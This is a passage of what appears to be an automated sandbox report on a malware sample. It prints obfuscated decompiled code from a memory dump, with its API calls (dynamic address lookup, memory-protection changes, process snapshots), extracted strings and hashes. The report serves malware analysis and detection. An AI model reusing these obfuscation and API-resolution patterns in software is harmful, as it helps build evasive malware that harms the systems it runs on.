                                                          							_t118 = _t115 + _t72 - 0xfffffffffffffff8;
                                                          							L33:
                                                          							 *0x5080fc =  *0x5080fc - _t118;
                                                          							L34:
                                                          							 *0x50afde =  *0x50afde + 0x6cac;
                                                          							_t193 = 0x6cac - _t217;
                                                          							_push( *(_t246 - 0x2c));
                                                          							 *(_t246 - 8) = _t72;
                                                          							if(_t72 >= 0x23b306) {
                                                          								L38:
                                                          								_t119 = 0;
                                                          								if(0 < _t193) {
                                                          									_t193 = _t193 + 1;
                                                          								}
                                                          								L40:
                                                          								_t195 =  *0x5081a8; // 0x779d
                                                          								 *0x509aeb =  *0x509aeb -  !0x8f58;
                                                          								L41:
                                                          								_t222 = 0;
                                                          								_t73 = _t72 + 0xba;
                                                          								L42:
                                                          								 *0x50afe3 =  *0x50afe3 + _t73;
                                                          								_push( *0x508457);
                                                          								_t234 = _t233 + _t233;
                                                          								 *0x508160 =  *0x508160 - _t195;
                                                          								 *((intOrPtr*)(_t246 - 0xc)) = _t119 - 0x50f031;
                                                          								_t76 =  *(_t246 - 8);
                                                          								if(_t195 < _t195) {
                                                          									L47:
                                                          									if(_t195 >= _t195) {
                                                          										_t195 = 0x6c1a;
                                                          									}
                                                          									_t196 = _t195 >> _t195;
                                                          									L50:
                                                          									_t77 = GetProcAddress();
                                                          									_t242 =  *0x50823a; // 0x381a
                                                          									if((_t242 & 0x0000bbfe) <= 0) {
                                                          										L55:
                                                          										L56:
                                                          										 *0x50afe5 = _t77;
                                                          										 *0x50976b = _t77;
                                                          										 *(_t246 - 8) = _t77;
                                                          										_push(0);
                                                          										L00466DA9("EnumWindowStationsA" + "EnumWindowStationsA" ^ 0x000051ca, _t234, _t242, 0,  *(_t246 - 8));
                                                          										_t83 =  *(_t246 - 8);
                                                          										_t136 = 0;
                                                          										 *(_t246 - 8) = _t83;
                                                          										if(_t83 < 0x26a9) {
                                                          											_t136 = 0xffffffffffffffff;
                                                          											 *0x508100 =  *0x508100;
                                                          										}
                                                          										_push( *0x5080ce);
                                                          										 *0x508aef = _t136;
                                                          										_t89 =  *(_t246 - 8);
                                                          										if(0x33a0d8 != 0x33a0d8) {
                                                          											 *0x508192 = 0x6d3d;
                                                          										}
                                                          										 *0x50afe1 = _t89;
                                                          										 *(_t246 - 8) = _t89;
                                                          										_push( *0x5080e6);
                                                          										_t204 = 0x6af6;
                                                          										if("xmllite.dll" == 0x367076) {
                                                          											_t204 = 0x6aa1;
                                                          											 *0x508166 = 0x6af6;
                                                          										}
                                                          										_push(1);
                                                          										_push(_t204 + _t204);
                                                          										_push(E00486A9F);
                                                          										_push(L00466DA9);
                                                          										return 0x2139af;
                                                          									}
                                                          									 *0x50afe6 = _t77;
                                                          									_t234 = _t234 - _t77;
                                                          									if(_t196 - 0x6e31 != _t196 - 0x6e31) {
                                                          										goto L56;
                                                          									}
                                                          									 *0x5081a2 =  *0x5081a2 + 0x9b69;
                                                          									if(8 < 0) {
                                                          									}
                                                          									 *0x50823e = _t242;
                                                          									 *0x50afe1 = _t77;
                                                          									goto L55;
                                                          								}
                                                          								_t196 = _t195 + _t195;
                                                          								if(_t196 > _t196) {
                                                          									 *0x5081e4 = _t222;
                                                          								}
                                                          								 *0x50afe6 = _t76;
                                                          								if(_t76 >= 0x1a3dde) {
                                                          									goto L50;
                                                          								} else {
                                                          									 *((intOrPtr*)(_t246 - 0x10)) = _t76 - 0x2f74a4 + 0x44ae;
                                                          									goto L47;
                                                          								}
                                                          							}
                                                          							_t119 =  !0x3ffc0f;
                                                          							_t193 = 0x6ec3;
                                                          							 *0x50afde =  *0x50afde + 0x6ec3;
                                                          							_t222 =  *0x5081f0; // 0x6f02
                                                          							 *0x50823e = _t239;
                                                          							_t239 = 0xffffffffffff2abd;
                                                          							 *0x50afe5 = _t72;
                                                          							if(_t72 <= 0) {
                                                          								goto L40;
                                                          							}
                                                          							_t73 = 1;
                                                          							if(1 != 0x859dd) {
                                                          								goto L42;
                                                          							}
                                                          							_t95 =  *0x5089cb; // 0x3760000
                                                          							_t72 = _t95 - 0x30bb;
                                                          							if( !0x3ffc0f >=  !0x3ffc0f) {
                                                          								goto L41;
                                                          							}
                                                          							goto L38;
                                                          						}
                                                          						_t118 = 0x4b50f6;
                                                          						if(0x58859c != 0x58859c) {
                                                          							goto L34;
                                                          						}
                                                          						 *0x508148 = 0x58859c;
                                                          						 *0x5096e7 =  *0x5096e7 + _t217;
                                                          						_t217 = _t217 - 0xa2d2;
                                                          						_t118 = 0xb5;
                                                          						_t239 =  !0x50afe1;
                                                          						if(0x50afe1 < 0) {
                                                          							goto L33;
                                                          						}
                                                          						_t233 = _t233 + 1;
                                                          						 *0x50afe6 = _t72;
                                                          						_t168 =  *0x50afd8; // -16
                                                          						_t115 = _t168 - 0x15f2;
                                                          						 *(_t246 - 8) = _t72;
                                                          						goto L32;
                                                          					}
                                                          					if(_t110 != 0x3825) {
                                                          						L23:
                                                          						_t216 = _t216 - 0x8e4810;
                                                          						 *0x50822a =  *0x50822a - _t216;
                                                          						 *0x509d27 =  *0x509d27 + _t238;
                                                          						L24:
                                                          						if(_t238 + _t238 < 0) {
                                                          						}
                                                          						if(0 == 0x22) {
                                                          							goto L28;
                                                          						} else {
                                                          							goto L27;
                                                          						}
                                                          					}
                                                          					_t110 = _t110 + 0x49;
                                                          					 *((intOrPtr*)(_t246 - 0x10)) =  *((intOrPtr*)(_t246 - 0x10)) - _t110;
                                                          					if((_t187 & 0x00000061) != (_t187 & 0x00000061)) {
                                                          						goto L24;
                                                          					}
                                                          					 *((intOrPtr*)(_t246 - 0x14)) =  *((intOrPtr*)(_t246 - 0x14)) - 0x6f55;
                                                          					 *0x5081c2 = _t216;
                                                          					_t216 = 0;
                                                          					goto L23;
                                                          				} else {
                                                          					 *0x50afe6 = _t65;
                                                          					 *0x50803e =  *0x50803e + _t65;
                                                          					if( !0x35ad79 >  !0x35ad79) {
                                                          						L16:
                                                          						_t233 = _t233 + _t233;
                                                          						 *0x50afd8 = _t65;
                                                          						L17:
                                                          						L18:
                                                          						goto L19;
                                                          					}
                                                          					_t187 = _t216;
                                                          					_t230 =  *0x5081ce; // 0xb268
                                                          					_t216 = _t230 - 0x9d;
                                                          					if((_t216 & 0x0000a259) != 0) {
                                                          						goto L17;
                                                          					}
                                                          					if((_t65 & 0x000000bd) == 0) {
                                                          					}
                                                          					if((_t65 & _t65) < 0) {
                                                          						goto L18;
                                                          					} else {
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}






































                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004868F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: Display.dll$EnumWindowStationsA$P8,$RemoveVectoredExceptionHandler$RtlEthernetStringToAddressW$credssp.dll$i $nshhttp.dll$vp6$xmllite.dll$Nqt$x?
                                                          • API String ID: 190572456-2255300545
                                                          • Opcode ID: dea4a20d8e45a825f52be4dc2ce9a0c38d229182947d6bb54fb986ae1bd0d74e
                                                          • Instruction ID: bbf9a3e37bb79ade75310c7395790c646b32bff193a35628358a88199ae4e34e
                                                          • Opcode Fuzzy Hash: dea4a20d8e45a825f52be4dc2ce9a0c38d229182947d6bb54fb986ae1bd0d74e
                                                          • Instruction Fuzzy Hash: 20D12579A14746CFCB00EFB8ECA4AED3BB1EF39310B08457AC884A7766E6350549D746
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,00000020,?,?), ref: 004BDCF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID: 6N$B5d$CNHMWL.dll$GetAccessPermissionsForObjectW$PenIMC_v0400.dll$WcnEapAuthProxy.dll$`gqt$nshhttp.dll$tsbyuv.dll$wmi.dll$>8$L/
                                                          • API String ID: 544645111-615128680
                                                          • Opcode ID: d71d99d5a4a20976c6d4451e7b6b2cf34c31c5c9a41bc704ff2e645c1e99687f
                                                          • Instruction ID: b8e927648c00d83e58d50db7fa20531e06589bca8cd439766b18d3af9eb0209e
                                                          • Opcode Fuzzy Hash: d71d99d5a4a20976c6d4451e7b6b2cf34c31c5c9a41bc704ff2e645c1e99687f
                                                          • Instruction Fuzzy Hash: 29C1D4BAF043468FCB00DFB9E994ADD7FB1EF7A310B0841AAC89497752E234050ADB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0047C1CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: !WV$/=Y$CIRCoInst.dll$EnumWindowStationsA$EtwEventWriteStartScenario$RtlImpersonateSelfEx$ddrawex.dll$kt"$lyncicon.exe$wlanmsm.dll$wmi.dll$Nqt
                                                          • API String ID: 190572456-3708624718
                                                          • Opcode ID: 096458b6c278c171b1cafdaca43a8506167521a7c052e892db70d08d6a9b274d
                                                          • Instruction ID: 782ee032746633927578dc1e63773aa4da4803b5fbee626c6f0a18fc650533e6
                                                          • Opcode Fuzzy Hash: 096458b6c278c171b1cafdaca43a8506167521a7c052e892db70d08d6a9b274d
                                                          • Instruction Fuzzy Hash: BAC16078A54706AFCB00EFB9E8D0AED7BB0FB28310F44907AD944E7352E6740A49DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 69%
                                                          			E004B983B(char* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				void* _t69;
                                                          				void* _t74;
                                                          				void* _t76;
                                                          				void* _t78;
                                                          				char* _t84;
                                                          				void* _t86;
                                                          				void* _t87;
                                                          				void* _t88;
                                                          				void* _t90;
                                                          				void* _t96;
                                                          				void* _t100;
                                                          				void* _t108;
                                                          				void* _t113;
                                                          				void* _t114;
                                                          				void* _t116;
                                                          				char* _t119;
                                                          				void* _t120;
                                                          				void* _t121;
                                                          				char* _t161;
                                                          				short _t163;
                                                          				signed char _t165;
                                                          				short _t169;
                                                          				short _t173;
                                                          				intOrPtr _t175;
                                                          				signed int _t183;
                                                          				short _t187;
                                                          				signed short _t192;
                                                          				void* _t195;
                                                          				void* _t196;
                                                          				void* _t200;
                                                          				signed short _t204;
                                                          				void* _t205;
                                                          				void* _t208;
                                                          				void* _t234;
                                                          
                                                          				_t200 = __esi;
                                                          				_t195 = __edi;
                                                          				_t119 = __ebx;
                                                          				_t163 = 0x6f10;
                                                          				E004B4C3A(_t69, __ebx, 0x6f10, __edx, __edi, __esi, 1, 0x6f10, 1);
                                                          				 *0x5081c0 =  *0x5081c0 - __edx;
                                                          				 *(_t208 - 8) = 0x89f2c;
                                                          				 *(_t208 - 8) = 0x89f2c;
                                                          				_t74 = CreateToolhelp32Snapshot(??, ??);
                                                          				_t183 = 0x995a58;
                                                          				 *(_t208 - 8) = _t74;
                                                          				if(_t74 != 0x235b) {
                                                          					L5:
                                                          					_t183 = _t183 + 0x91bd;
                                                          				} else {
                                                          					if(__ebx > 0x26c7f3) {
                                                          						L4:
                                                          						 *0x508196 = _t163;
                                                          						_t163 = _t163 + _t183;
                                                          						goto L5;
                                                          					} else {
                                                          						_t119 = "psxdllsvr.dll";
                                                          						if(_t119 == _t119) {
                                                          							_t163 = 0x6a50;
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          				}
                                                          				 *0x508216 =  *0x508216 - _t183;
                                                          				_t204 = _t200 + 0x1533379;
                                                          				_t196 = _t195 - 0xe877;
                                                          				_t76 =  *(_t208 - 8);
                                                          				 *(_t208 - 0x44) = _t76;
                                                          				 *(_t208 - 8) =  *(_t208 - 8) + _t76;
                                                          				_t120 = _t119 - 0x3e;
                                                          				 *(_t208 - 8) = _t76;
                                                          				_t78 =  *(_t208 - 8);
                                                          				if( *(_t208 - 0x44) == 0xffffffff) {
                                                          					return _t78;
                                                          				} else {
                                                          					 *0x50afe5 = _t78;
                                                          					 *(_t208 - 8) = _t78;
                                                          					if(_t78 != 0x19) {
                                                          						_t116 =  *(_t208 - 0xc);
                                                          						_t161 = "AddInUtil.exe";
                                                          						 *(_t208 - 0x14) =  *(_t208 - 0x14) - _t161;
                                                          						_t120 = _t161 - 0x57e2;
                                                          						if(_t163 == _t163) {
                                                          						}
                                                          						if((_t183 & 0x00007f4f) < 0) {
                                                          							_t183 = _t183 + 1;
                                                          							 *0x50820c = _t183;
                                                          							 *0x50afe3 = 0xc1;
                                                          							_t116 = 0x182;
                                                          							_t196 = _t196 + _t196;
                                                          						}
                                                          						_t196 = _t196 + 0xd52d85;
                                                          						 *0x5083af = _t116;
                                                          					}
                                                          					_t121 = _t120 - 0x3a8bb3;
                                                          					 *0x50810a =  *0x50810a + _t121;
                                                          					if(_t121 > _t163) {
                                                          						_t175 = E00508174; // 0x28a9
                                                          						_t163 = _t175 - 1;
                                                          					}
                                                          					 *0x5081de = _t183;
                                                          					 *0x50afdf =  *0x50afdf + (_t183 | 0x00008a53);
                                                          					 *(_t208 - 8) = 0x128;
                                                          					_t84 = "ddrawex.dll";
                                                          					 *(_t208 - 0x14) =  *(_t208 - 0x14) - "GetAccessPermissionsForObjectW";
                                                          					_t165 = _t163 + 0x7a8e - 0x59a459;
                                                          					if(_t165 < _t165 || _t165 < _t165) {
                                                          						 *0x50afe1 = _t84;
                                                          					}
                                                          					_t86 =  *(_t208 - 8);
                                                          					 *(_t208 - 0x16c) = _t86;
                                                          					 *(_t208 - 8) = _t86;
                                                          					_t87 =  *(_t208 - 8);
                                                          					 *((intOrPtr*)(_t208 - 0x18)) = (0x14cd81 >> _t165) + (0x14cd81 >> _t165) + 0x4680;
                                                          					 *(_t208 - 8) = _t87;
                                                          					if(_t87 < 0x18) {
                                                          						L23:
                                                          						_t88 = _t87 + _t87;
                                                          						if(_t88 >= 0x1dbf82 || _t88 <= 0x24d1c4) {
                                                          							goto L25;
                                                          						}
                                                          					} else {
                                                          						_t113 =  *(_t208 - 0xc);
                                                          						 *0x50afdc =  *0x50afdc + 0x320669;
                                                          						 *(_t208 - 0x14) = 0x320669;
                                                          						_t173 =  *0x50811e; // 0x60ed
                                                          						 *0x508170 = _t173;
                                                          						_t165 = 0;
                                                          						 *0x50820a = 0x8e81;
                                                          						if(0x8600 > 0) {
                                                          							L25:
                                                          							 *0x508120 =  *0x508120 + _t165;
                                                          							 *0x50813e =  *0x50813e - _t165;
                                                          							_t165 = 0x77e5;
                                                          							_t234 = 0x77e5;
                                                          						} else {
                                                          							if((_t204 & 0x0000b5ed) != 0) {
                                                          								 *0x50afe3 =  *0x50afe3 + _t113;
                                                          								 *0x50afe3 = _t113;
                                                          							}
                                                          							_t114 =  *0x50afe5; // -1
                                                          							_t87 = _t114 - 0xf1;
                                                          							 *0x50870d =  *0x50870d - _t196;
                                                          							 *0x50afd8 =  *0x50afd8 + _t87;
                                                          							goto L23;
                                                          						}
                                                          					}
                                                          					_t187 =  *0x50820e; // 0x8c83
                                                          					_t90 = _t208 - 0x16c;
                                                          					_t205 = _t204 - 1;
                                                          					 *0x508359 =  *0x508359 + _t205;
                                                          					 *0x5083eb =  *0x5083eb + _t90;
                                                          					 *(_t208 - 8) = _t90;
                                                          					 *(_t208 - 0x10) = "WindowsCodecs.dll";
                                                          					E004B6988(0x4a0ccd, _t187, 0x50ff1c, _t205, _t234, 1);
                                                          					 *(_t208 - 0x14) =  &(( *(_t208 - 0x14))[0xd34a5]);
                                                          					_t96 =  *(_t208 - 8);
                                                          					if(0xd34a5 <= _t165) {
                                                          						L28:
                                                          						 *0x50afe5 = _t96;
                                                          					} else {
                                                          						 *0x5081b0 = _t187;
                                                          						_t192 = _t187 + _t187;
                                                          						 *0x50821a =  *0x50821a + _t192;
                                                          						if((_t192 & 0x0000aa56) == 0) {
                                                          							goto L28;
                                                          						}
                                                          					}
                                                          					 *0x508010 =  *0x508010 - _t96;
                                                          					 *(_t208 - 0x170) = _t96;
                                                          					_t167 = 0x753c;
                                                          					 *(_t208 - 8) = _t96;
                                                          					if(_t96 <= 0x153a38) {
                                                          						 *(_t208 - 0x14) = "RtlImpersonateSelfEx";
                                                          						_t167 = 0x63773b;
                                                          						 *0x50818a = 0x753c;
                                                          					}
                                                          					 *(_t208 - 0xc) =  *(_t208 - 8);
                                                          					 *(_t208 - 8) =  *(_t208 - 0xc);
                                                          					_t100 =  *(_t208 - 8);
                                                          					_push( *(_t208 - 0x170));
                                                          					 *0x50afe3 = _t100;
                                                          					 *(_t208 - 8) = _t100;
                                                          					_t108 =  *(_t208 - 8);
                                                          					 *0x508134 = _t167;
                                                          					_t169 = _t167 - 0xfffffffffffff03c;
                                                          					_push( *(_t208 - 0x44));
                                                          					 *0x508188 = _t169;
                                                          					if(_t169 != _t169) {
                                                          						 *0x509a9f =  *0x509a9f - 0x8d5d;
                                                          						 *0x508222 = 0x8d5d;
                                                          					}
                                                          					 *(_t208 - 8) = _t108;
                                                          					 *(_t208 - 0x10) = _t108;
                                                          					 *0x50813c = _t169;
                                                          					_push(E004B9C6E);
                                                          					_push( *0x50920b);
                                                          					return  *(_t208 - 8);
                                                          				}
                                                          			}

                                                          0x004b9ba7
                                                          0x004b9bbc
                                                          0x004b9bc6
                                                          0x004b9bfd
                                                          0x004b9c05
                                                          0x004b9c11
                                                          0x004b9c16
                                                          0x004b9c19
                                                          0x004b9c22
                                                          0x004b9c28
                                                          0x004b9c2e
                                                          0x004b9c39
                                                          0x004b9c3d
                                                          0x004b9c4a
                                                          0x004b9c59
                                                          0x004b9c62
                                                          0x004b9c67
                                                          0x004b9c6d
                                                          0x004b9c6d

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 004B9871
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID: AddInUtil.exe$B5d$GetAccessPermissionsForObjectW$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$PenIMC_v0400.dll$RtlImpersonateSelfEx$WSearchMigPlugin.dll$WindowsCodecs.dll$ddrawex.dll$lyncicon.exe$psxdllsvr.dll$x4
                                                          • API String ID: 3332741929-3274282594
                                                          • Opcode ID: 20ce2764f3c1e59695204d3b8dc077bddf81dfdf80c6f8bbaedbf9ebc11d3014
                                                          • Instruction ID: 210b0d064c85cda43ff9e512ff9d9878df58d780c71bc00a45d7177e780d9766
                                                          • Opcode Fuzzy Hash: 20ce2764f3c1e59695204d3b8dc077bddf81dfdf80c6f8bbaedbf9ebc11d3014
                                                          • Instruction Fuzzy Hash: F1B19DB9E107068BCB00EFB8D894ADD7BB1EB38310F08416AD984E7356E2750A49DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 23%
                                                          			E004A0403() {
                                                          				_Unknown_base(*)()* _t51;
                                                          				_Unknown_base(*)()* _t52;
                                                          				_Unknown_base(*)()* _t54;
                                                          				_Unknown_base(*)()* _t59;
                                                          				_Unknown_base(*)()* _t61;
                                                          				_Unknown_base(*)()* _t63;
                                                          				_Unknown_base(*)()* _t65;
                                                          				_Unknown_base(*)()* _t74;
                                                          				_Unknown_base(*)()* _t76;
                                                          				_Unknown_base(*)()* _t83;
                                                          				intOrPtr _t86;
                                                          				void* _t88;
                                                          				signed int _t98;
                                                          				signed int _t99;
                                                          				char* _t114;
                                                          				signed char _t130;
                                                          				signed char _t132;
                                                          				short _t135;
                                                          				signed int _t136;
                                                          				short _t140;
                                                          				short _t151;
                                                          				signed int _t152;
                                                          				short _t156;
                                                          				void* _t163;
                                                          				signed int _t166;
                                                          				void* _t168;
                                                          
                                                          				if(_t88 >= _t88) {
                                                          					L4:
                                                          					 *0x50afe0 =  *0x50afe0 - _t151;
                                                          					_t152 = 0;
                                                          					_t52 =  *0x50afe1; // -128
                                                          					L5:
                                                          					 *0x50afe3 = _t52;
                                                          					_t54 = GetProcAddress(??, ??);
                                                          					if((_t152 & 0x0093a253) == 0) {
                                                          						_t166 = _t166 >> _t132;
                                                          					}
                                                          					_t167 = _t166 - 0xcc08;
                                                          					if(_t163 >= 0) {
                                                          						 *0x50afe5 = _t54;
                                                          					}
                                                          					 *(_t168 - 8) = _t54;
                                                          					 *(_t168 - 0xc) = 0x319293;
                                                          					_push(0x319293);
                                                          					_push(1);
                                                          					_push(1);
                                                          					E00467687();
                                                          					E004650DC(0, 0x6694, _t152, _t163, _t167, 1);
                                                          					 *(_t168 - 0x10) =  &(( *(_t168 - 0x10))[0x6694]);
                                                          					_t135 =  *0x50818e; // 0x67a3
                                                          					_t59 =  *(_t168 - 8);
                                                          					 *0x5093a7 = _t59;
                                                          					 *(_t168 - 8) = _t59;
                                                          					_t98 = "psxdllsvr.dll";
                                                          					 *0x508110 =  *0x508110;
                                                          					_t61 =  *(_t168 - 8);
                                                          					_t136 = _t135 + _t135;
                                                          					if(_t136 <= _t136) {
                                                          						_t136 =  !_t136;
                                                          					}
                                                          					 *(_t168 - 8) = _t61;
                                                          					_t63 =  *(_t168 - 8);
                                                          					 *(_t168 - 0xc) = _t98;
                                                          					_t99 = _t98 & 0x00000045;
                                                          					if(_t136 > _t136) {
                                                          						 *0x508148 =  *0x508148 - _t136;
                                                          					}
                                                          					 *0x508182 = _t136;
                                                          					_t156 = 0x8b57;
                                                          					 *(_t168 - 8) = _t63;
                                                          					if(_t99 < 0x36) {
                                                          					}
                                                          					 *0x508134 = _t136;
                                                          					_t65 =  *(_t168 - 8);
                                                          					_t139 =  !0x74bb;
                                                          					_push(0);
                                                          					 *0x50870b =  *0x50870b + _t163 - 1;
                                                          					if(_t65 <= 0x870) {
                                                          						L20:
                                                          						 *(_t168 - 8) =  *(_t168 - 8) + _t65;
                                                          						 *(_t168 - 8) = _t65;
                                                          						_t103 = 0xffffffffffe3b6f6;
                                                          						goto L21;
                                                          					} else {
                                                          						 *(_t168 - 8) = _t65;
                                                          						 *(_t168 - 0xc) = 0x1cc884;
                                                          						_t103 = 0x473611;
                                                          						 *0x50811e =  *0x50811e - 0x74bb;
                                                          						_t139 = 0x175b75a;
                                                          						if(0x175b75a <= 0x175b75a) {
                                                          							L19:
                                                          							 *0x50afe5 =  *0x50afe5 + _t65;
                                                          							goto L20;
                                                          						}
                                                          						_t139 = 0x175b7db;
                                                          						 *0x50975f =  *0x50975f - _t156;
                                                          						 *0x5081d8 = _t156;
                                                          						_t156 =  *0x508226; // 0x298b
                                                          						_t167 = 0xb5e5;
                                                          						if(0xb5e5 != 0) {
                                                          							L21:
                                                          							 *0x5080ee =  *0x5080ee + _t103;
                                                          							_t140 = _t139 - 1;
                                                          							 *0x50818e = _t140;
                                                          							 *0x5081a8 = _t156;
                                                          							_push( *0x5080b4);
                                                          							 *(_t168 - 8) = _t65;
                                                          							 *(_t168 - 0xc) = "EtwEventWriteStartScenario";
                                                          							 *0x508164 = _t140;
                                                          							L0046426A(_t140, _t167, 0x44d32b, 0);
                                                          							_t74 =  *(_t168 - 8);
                                                          							_push( *0x50809c);
                                                          							if(0x82532d >= 0) {
                                                          								 *0x50afe3 = _t74;
                                                          							}
                                                          							 *(_t168 - 8) = _t74;
                                                          							_t76 =  *(_t168 - 8);
                                                          							_push( *0x508026);
                                                          							_t114 =  *(_t168 - 0x10);
                                                          							if(0x7640 > 0x7640) {
                                                          								 *0x50815a = 0x7640;
                                                          							}
                                                          							 *(_t168 - 8) = _t76;
                                                          							E00465B85(_t167,  &(_t114[_t114]), 1);
                                                          							 *(_t168 - 0x10) = "nshhttp.dll";
                                                          							_push( *0x5080ce);
                                                          							 *0x50812e = 0x8039;
                                                          							_t83 =  *(_t168 - 8);
                                                          							_push( *0x508026);
                                                          							 *(_t168 - 8) = _t83;
                                                          							_push(_t83);
                                                          							_push(_t83);
                                                          							_push(_t83);
                                                          							_push(E004A076A);
                                                          							goto __eax;
                                                          						}
                                                          						_t167 = 0;
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          				_t130 = _t132;
                                                          				_t132 =  *0x508164; // 0x5f72
                                                          				 *0x5081b0 = _t151;
                                                          				_t152 = 0xffffffffff754fae;
                                                          				 *0x50afe1 = _t51;
                                                          				if((_t166 & 0x00a6f95c) <= 0) {
                                                          					L3:
                                                          					 *0x508168 =  *(_t168 - 0x10);
                                                          					_t132 = 0x76696b;
                                                          					_t151 = _t152 + 0x93cc;
                                                          					goto L4;
                                                          				}
                                                          				_t166 = _t166 + 0xb51de0;
                                                          				 *0x50afe5 = _t51;
                                                          				_t86 =  *0x50afe6; // -97
                                                          				 *0x508010 =  *0x508010 - _t163;
                                                          				 *0x508563 =  *0x508563 - _t86;
                                                          				_t52 =  *0x50894b;
                                                          				if(_t130 > 0x36) {
                                                          					goto L5;
                                                          				}
                                                          				goto L3;
                                                          			}

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: *;$6$Display.dll$EtwEventWriteStartScenario$RtlEthernetStringToAddressW$credssp.dll$ddrawex.dll$nshhttp.dll$psxdllsvr.dll$wlanmsm.dll$Nqt
                                                          • API String ID: 190572456-101125327
                                                          • Opcode ID: c541b3fb91456b454051bc1fe4debd1979c1128657a96cd9c852d798b1038d99
                                                          • Instruction ID: 28e7dd310f3a269981756c663c4de0c6de99d51c9f8f7b4cb362dd5768727146
                                                          • Opcode Fuzzy Hash: c541b3fb91456b454051bc1fe4debd1979c1128657a96cd9c852d798b1038d99
                                                          • Instruction Fuzzy Hash: 9691AF79E403069FDB00EFB4E894AED7BB0FB39314F00506AD984E7352E6780A49DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00491937
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EnumWindowStationsA$System.Web.DynamicData.dll$WindowsCodecs.dll$charmap.exe$credssp.dll$nshhttp.dll$psxdllsvr.dll$xmllite.dll$Cqt$Nqt
                                                          • API String ID: 190572456-2454711322
                                                          • Opcode ID: 80b136647fb6f166b64a84947170b175847a5972e9d77212890b2eb2e4eabd34
                                                          • Instruction ID: e71317d0013655ec16321e58812f4326ed17f28530cf46c844fed2f65230c6e2
                                                          • Opcode Fuzzy Hash: 80b136647fb6f166b64a84947170b175847a5972e9d77212890b2eb2e4eabd34
                                                          • Instruction Fuzzy Hash: EAD1C1B9A403438FCB00EFB8EC94ADD7FB1EB39310B44407AC895A7362E6390949E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 23%
                                                          			E004FF332(void* __ebx, signed int __ecx, unsigned int __edx, unsigned short __edi, void* __eflags) {
                                                          				char _t69;
                                                          				char _t76;
                                                          				char _t88;
                                                          				char _t90;
                                                          				intOrPtr _t94;
                                                          				char _t102;
                                                          				char _t106;
                                                          				void* _t131;
                                                          				void* _t139;
                                                          				intOrPtr _t145;
                                                          				signed char _t180;
                                                          				short _t182;
                                                          				signed int _t186;
                                                          				short _t187;
                                                          				intOrPtr _t191;
                                                          				intOrPtr _t199;
                                                          				signed int _t201;
                                                          				signed int _t202;
                                                          				unsigned short _t209;
                                                          				unsigned short _t210;
                                                          				intOrPtr _t223;
                                                          				void* _t224;
                                                          				void* _t226;
                                                          				short _t227;
                                                          				signed int _t228;
                                                          				void* _t232;
                                                          
                                                          				_t209 = __edi;
                                                          				_t180 = __ecx;
                                                          				_t69 =  *((intOrPtr*)(_t232 - 8));
                                                          				 *((intOrPtr*)(_t232 - 0x44)) = _t69;
                                                          				_t201 = __edx >> __ecx;
                                                          				_t223 =  *0x50822c; // 0x9f6d
                                                          				 *0x50afe3 = _t69;
                                                          				_t224 = _t223 + 0xc0bc60;
                                                          				 *((intOrPtr*)(_t232 - 8)) = _t69;
                                                          				E004650DC(0xe2, __ecx, _t201, __edi, _t224, "BuildExplicitAccessWithNameA");
                                                          				if(0x426397 == 0x426397) {
                                                          					if(__ecx < __ecx) {
                                                          						_t199 =  *0x508160; // 0x6f15
                                                          						_t180 = _t199 + 1;
                                                          						 *0x5081ac = _t201;
                                                          						_t201 =  *0x5081fa; // 0x8a34
                                                          					}
                                                          					_t201 = _t201 - 0xa0c0;
                                                          					E00508246 = E00508246 + _t224;
                                                          				}
                                                          				_t226 = _t224 + _t224 + 0xb387ba;
